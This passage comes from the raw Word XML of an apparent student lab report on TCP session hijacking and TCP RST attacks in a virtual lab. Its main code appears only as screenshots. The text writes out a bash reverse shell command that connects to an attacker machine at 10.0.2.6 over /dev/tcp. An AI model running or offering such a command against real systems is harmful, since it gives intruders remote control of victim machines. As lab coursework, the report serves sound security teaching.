    <w:p w14:paraId="75E93F4E" w14:textId="74F8964E" w:rsidR="00860B67" w:rsidRDefault="00860B67" w:rsidP="00C67154">
      <w:r>
        <w:t>Upon running this command, we see in wireshark a new packet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09135ED7" w14:textId="2B50312E" w:rsidR="00860B67" w:rsidRPr="00860B67" w:rsidRDefault="003E4547" w:rsidP="00C81BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F7B97B" wp14:editId="4E9F42D4">
            <wp:extent cx="5935980" cy="2743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274320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00860B67">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F4343C">
        <w:t>With the following information.</w:t>
      </w:r>
      <w:r w:rsidR="00860B67">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E26D2F6" wp14:editId="6A903C43">
            <wp:extent cx="5939790" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="38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1135380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F4343C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F4343C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Thus, we see that our command worked and we hijacked the session and </w:t>
      </w:r>
      <w:r w:rsidR="00B65C60">
        <w:t>the data shows : “cat important.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A13148" w14:textId="56F2F760" w:rsidR="00860B67" w:rsidRDefault="0036133F" w:rsidP="00C67154">
      <w:r>
        <w:t>We can do a similar thing using scapy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42090B0C" w14:textId="136666C6" w:rsidR="0036133F" w:rsidRDefault="002E522D" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C07773" wp14:editId="25721A71">
            <wp:extent cx="5589814" cy="1504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94903" cy="1506320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37033BBF" w14:textId="7C2BBD31" w:rsidR="00223A95" w:rsidRDefault="00223A95" w:rsidP="00C67154">
      <w:r>
        <w:t>Using all those information, can make up the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784A58B" w14:textId="77777777" w:rsidR="0005519E" w:rsidRDefault="00606308" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BFF4954" wp14:editId="7938F347">
            <wp:extent cx="5231130" cy="946234"/>
            <wp:effectExtent l="0" t="0" r="762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45582" cy="948848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CB218A">
        <w:br/>
        <w:t>Running it results in</w:t>
      </w:r>
      <w:r w:rsidR="008F47FD">
        <w:t xml:space="preserve"> a new packet</w:t>
      </w:r>
      <w:r w:rsidR="00CB218A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA2885D" w14:textId="7009F8DF" w:rsidR="00CB218A" w:rsidRDefault="0005519E" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55956DA4" wp14:editId="7C84787C">
            <wp:extent cx="4069080" cy="1473017"/>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0776" cy="1473631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CB218A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003E5714">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69152BA2" wp14:editId="6E1DE24F">
            <wp:extent cx="5943600" cy="2438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43840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003E5714">
        <w:br/>
        <w:t>The new packet shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B5F9B8" w14:textId="15483563" w:rsidR="009271DD" w:rsidRDefault="009271DD" w:rsidP="00C67154">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6AAA87" wp14:editId="2A99B8CA">
            <wp:extent cx="5935980" cy="107823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5980" cy="1078230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F626052" w14:textId="6D98AF27" w:rsidR="00D66296" w:rsidRDefault="00D66296" w:rsidP="00C67154">
      <w:r>
        <w:t xml:space="preserve">We can see that our scapy file did its job and it hijacked the session and </w:t>
      </w:r>
      <w:r w:rsidR="00DC177B">
        <w:t xml:space="preserve">I think </w:t>
      </w:r>
      <w:r>
        <w:t>ran the command “cat important.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34C6FF" w14:textId="332B0613" w:rsidR="009271DD" w:rsidRDefault="007311B2" w:rsidP="00C67154">
      <w:r>
        <w:t xml:space="preserve">Thus, we have done TCP session hijacking using command line and </w:t>
      </w:r>
      <w:r w:rsidR="004D2CB7">
        <w:t>scapy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA6649" w14:textId="53F1A5A6" w:rsidR="007311B2" w:rsidRDefault="0005519E" w:rsidP="0005519E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 3.5 </w:t>
      </w:r>
      <w:r w:rsidR="003B3832">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B3832">
        <w:t>Creating Reverse Shell using TCP session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786CB57B" w14:textId="78446984" w:rsidR="003B3832" w:rsidRDefault="00A32BBE" w:rsidP="003B3832">
      <w:r>
        <w:t>First we need to prepare a port on the attack machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390D746" w14:textId="5EC2E881" w:rsidR="00A32BBE" w:rsidRDefault="00A32BBE" w:rsidP="003B3832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C30D88F" wp14:editId="5F897C9B">
            <wp:extent cx="3806190" cy="42672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06190" cy="426720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="305518E0" w14:textId="6415EF12" w:rsidR="00B80109" w:rsidRDefault="00B80109" w:rsidP="003B3832">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The command to run that allows us to create a reverse shell is: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80109">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00325DC6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80109">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">/9090 </w:t>
      </w:r>
      <w:r w:rsidR="00325DC6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>0&lt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="000D2E31">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E9CA40" w14:textId="2B07BFCB" w:rsidR="001A7BBB" w:rsidRDefault="0076526B" w:rsidP="003B3832">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Doing a similar thing as Task 3.4 but with that command</w:t>
      </w:r>
      <w:r w:rsidR="000B6CFD">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001A7BBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001A7BBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B0D951" wp14:editId="15727D3C">
            <wp:extent cx="4792980" cy="1004682"/>
            <wp:effectExtent l="0" t="0" r="762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2403" cy="1008753"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D244BFF" w14:textId="3050A10C" w:rsidR="0076526B" w:rsidRDefault="003935FC" w:rsidP="003B3832">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>However, I could not get this to work. The data I sent was probably not formatted correct, as in it didn’t run the command but it just sent it as data.</w:t>
      </w:r>
      <w:r w:rsidR="005F154B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005F154B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A3837A" wp14:editId="6B705421">
            <wp:extent cx="5935980" cy="7696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769620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009D0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="009D0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We should get the following</w:t>
      </w:r>
      <w:r w:rsidR="00B83B8F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, if done correctly,</w:t>
      </w:r>
      <w:r w:rsidR="009D0818">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> when we go back to the port we were listening to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142AC5AB" w14:textId="596318A7" w:rsidR="0076526B" w:rsidRDefault="0039341F" w:rsidP="003B3832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44C94E12" wp14:editId="69DC1202">
            <wp:extent cx="5036820" cy="3274903"/>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8662" cy="3276101"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0054150E">
        <w:br/>
        <w:t xml:space="preserve">Can see </w:t>
      </w:r>
      <w:r w:rsidR="000E223C">
        <w:t>that the attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00E13A28">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000E223C">
        <w:t xml:space="preserve"> 10.0.2.6,</w:t>
      </w:r>
      <w:r w:rsidR="0065493B">
        <w:t xml:space="preserve"> is now</w:t>
      </w:r>
      <w:r w:rsidR="000E223C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0054150E">
        <w:t>in the shell of the other machine as the ip</w:t>
      </w:r>
      <w:r w:rsidR="00A81379">
        <w:t xml:space="preserve"> shown</w:t>
      </w:r>
      <w:r w:rsidR="0054150E">
        <w:t xml:space="preserve"> is 10.0.2.4, the clients machine.</w:t>
      </w:r>
      <w:r w:rsidR="00276B86">
        <w:t xml:space="preserve"> This is how u create a reverse shell using TCP session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E04CF8" w14:textId="16C5E0A8" w:rsidR="00C774A5" w:rsidRDefault="00DD7733" w:rsidP="00DD7733">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Final Thoughts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB5D44" w14:textId="2C9D6393" w:rsidR="00DD7733" w:rsidRPr="00DD7733" w:rsidRDefault="00DD7733" w:rsidP="00DD7733">
      <w:r>
        <w:t xml:space="preserve">This was a very interesting lab. One of the surprising thing that I found from this lab was that you can TCP RST Attack on video streaming sites or sites in general. </w:t>
      </w:r>
      <w:r w:rsidR="00E80F24">
        <w:t xml:space="preserve">Also, throughout this lab, I had to go to telnet connect to the victim to get all the info (ack number, sequence number, etc), </w:t>
      </w:r>
      <w:r w:rsidR="0058154D">
        <w:t xml:space="preserve">in order to do a </w:t>
      </w:r>
      <w:r w:rsidR="00E80F24">
        <w:t>TCP RST attack. I wonder how hard it is to get those information</w:t>
      </w:r>
      <w:r w:rsidR="006C7FA8">
        <w:t xml:space="preserve"> as a third party</w:t>
      </w:r>
      <w:r w:rsidR="00E80F24">
        <w:t>. Nevertheless, It was a nice and interesting lab.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DD7733" w:rsidRPr="00DD77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231"/>
    <w:rsid w:val="0005519E"/>
    <w:rsid w:val="000916FF"/>
    <w:rsid w:val="000B6CFD"/>
    <w:rsid w:val="000D2E31"/>
    <w:rsid w:val="000E223C"/>
    <w:rsid w:val="000E711B"/>
    <w:rsid w:val="00104B00"/>
    <w:rsid w:val="00110591"/>
    <w:rsid w:val="00113BFC"/>
    <w:rsid w:val="00167F46"/>
    <w:rsid w:val="001703F5"/>
    <w:rsid w:val="0017203D"/>
    <w:rsid w:val="001A7BBB"/>
    <w:rsid w:val="001B52C0"/>
    <w:rsid w:val="001C5AE6"/>
    <w:rsid w:val="00223A95"/>
    <w:rsid w:val="002511B2"/>
    <w:rsid w:val="002669A7"/>
    <w:rsid w:val="00276B86"/>
    <w:rsid w:val="002A63C7"/>
    <w:rsid w:val="002D5659"/>
    <w:rsid w:val="002E40A8"/>
    <w:rsid w:val="002E522D"/>
    <w:rsid w:val="002F168E"/>
    <w:rsid w:val="00325DC6"/>
    <w:rsid w:val="0036133F"/>
    <w:rsid w:val="0039341F"/>
    <w:rsid w:val="003935FC"/>
    <w:rsid w:val="003B09AA"/>
    <w:rsid w:val="003B3832"/>
    <w:rsid w:val="003E4547"/>
    <w:rsid w:val="003E5221"/>
    <w:rsid w:val="003E5714"/>
    <w:rsid w:val="00401752"/>
    <w:rsid w:val="00411479"/>
    <w:rsid w:val="00436A4C"/>
    <w:rsid w:val="004608D8"/>
    <w:rsid w:val="0047225C"/>
    <w:rsid w:val="00476998"/>
    <w:rsid w:val="004802E7"/>
    <w:rsid w:val="004A217D"/>
    <w:rsid w:val="004A3ECE"/>
    <w:rsid w:val="004A7BAB"/>
    <w:rsid w:val="004D2CB7"/>
    <w:rsid w:val="004F609B"/>
    <w:rsid w:val="005259A9"/>
    <w:rsid w:val="0054150E"/>
    <w:rsid w:val="00552178"/>
    <w:rsid w:val="00554979"/>
    <w:rsid w:val="0058154D"/>
    <w:rsid w:val="00590E08"/>
    <w:rsid w:val="005B415B"/>
    <w:rsid w:val="005B7385"/>
    <w:rsid w:val="005E207B"/>
    <w:rsid w:val="005F154B"/>
    <w:rsid w:val="00606308"/>
    <w:rsid w:val="00630B82"/>
    <w:rsid w:val="0065493B"/>
    <w:rsid w:val="0067706E"/>
    <w:rsid w:val="006A49CC"/>
    <w:rsid w:val="006C7FA8"/>
    <w:rsid w:val="006F12A8"/>
    <w:rsid w:val="007013F3"/>
    <w:rsid w:val="00722126"/>
    <w:rsid w:val="007311B2"/>
    <w:rsid w:val="0076526B"/>
    <w:rsid w:val="007B5B0A"/>
    <w:rsid w:val="007E617D"/>
    <w:rsid w:val="0082276A"/>
    <w:rsid w:val="0084696A"/>
    <w:rsid w:val="00855E0C"/>
    <w:rsid w:val="00860B67"/>
    <w:rsid w:val="008658C4"/>
    <w:rsid w:val="008B7B0B"/>
    <w:rsid w:val="008C1740"/>
    <w:rsid w:val="008D606D"/>
    <w:rsid w:val="008F47FD"/>
    <w:rsid w:val="009064B5"/>
    <w:rsid w:val="00915A29"/>
    <w:rsid w:val="009177A0"/>
    <w:rsid w:val="00925F6D"/>
    <w:rsid w:val="009271DD"/>
    <w:rsid w:val="00960755"/>
    <w:rsid w:val="00985890"/>
    <w:rsid w:val="009C7ACF"/>
    <w:rsid w:val="009D0818"/>
    <w:rsid w:val="00A13DAE"/>
    <w:rsid w:val="00A1740C"/>
    <w:rsid w:val="00A32BBE"/>
    <w:rsid w:val="00A42234"/>
    <w:rsid w:val="00A54951"/>
    <w:rsid w:val="00A74433"/>
    <w:rsid w:val="00A81379"/>
    <w:rsid w:val="00A958F0"/>
    <w:rsid w:val="00AE688F"/>
    <w:rsid w:val="00AF4F91"/>
    <w:rsid w:val="00B158B2"/>
    <w:rsid w:val="00B341CF"/>
    <w:rsid w:val="00B364DA"/>
    <w:rsid w:val="00B569A1"/>
    <w:rsid w:val="00B602D2"/>
    <w:rsid w:val="00B65C60"/>
    <w:rsid w:val="00B80109"/>
    <w:rsid w:val="00B83B8F"/>
    <w:rsid w:val="00BA3231"/>
    <w:rsid w:val="00BB40A1"/>
    <w:rsid w:val="00C67154"/>
    <w:rsid w:val="00C774A5"/>
    <w:rsid w:val="00C81BE7"/>
    <w:rsid w:val="00C820F3"/>
    <w:rsid w:val="00CB218A"/>
    <w:rsid w:val="00CB70B7"/>
    <w:rsid w:val="00D030E5"/>
    <w:rsid w:val="00D2698C"/>
    <w:rsid w:val="00D32095"/>
    <w:rsid w:val="00D66296"/>
    <w:rsid w:val="00D81260"/>
    <w:rsid w:val="00DC177B"/>
    <w:rsid w:val="00DD7733"/>
    <w:rsid w:val="00DE7111"/>
    <w:rsid w:val="00DF2D68"/>
    <w:rsid w:val="00E019EB"/>
    <w:rsid w:val="00E13A28"/>
    <w:rsid w:val="00E205EC"/>
    <w:rsid w:val="00E41C83"/>
    <w:rsid w:val="00E53465"/>
    <w:rsid w:val="00E80F24"/>
    <w:rsid w:val="00EA3E29"/>
    <w:rsid w:val="00ED28A3"/>
    <w:rsid w:val="00F028EA"/>
    <w:rsid w:val="00F4343C"/>
    <w:rsid w:val="00F62B7E"/>
    <w:rsid w:val="00F74159"/>
    <w:rsid w:val="00F8481D"/>
    <w:rsid w:val="00F933B9"/>
    <w:rsid w:val="00FB163A"/>
    <w:rsid w:val="00FC2396"/>
    <w:rsid w:val="00FD01E4"/>
    <w:rsid w:val="00FF2B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F7A14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{04F244D8-7285-4234-ADE8-F425CC26A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21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521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217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52178"/>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860B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60B67"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00860B6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7679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jpe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jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpe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jpeg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpe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369</TotalTime>
  <Pages>9</Pages>
  <Words>756</Words>
  <Characters>4310</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mgameng1@hawk.iit.edu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mgameng1@hawk.iit.edu</cp:lastModifiedBy>
  <cp:revision>137</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-24T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-25T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>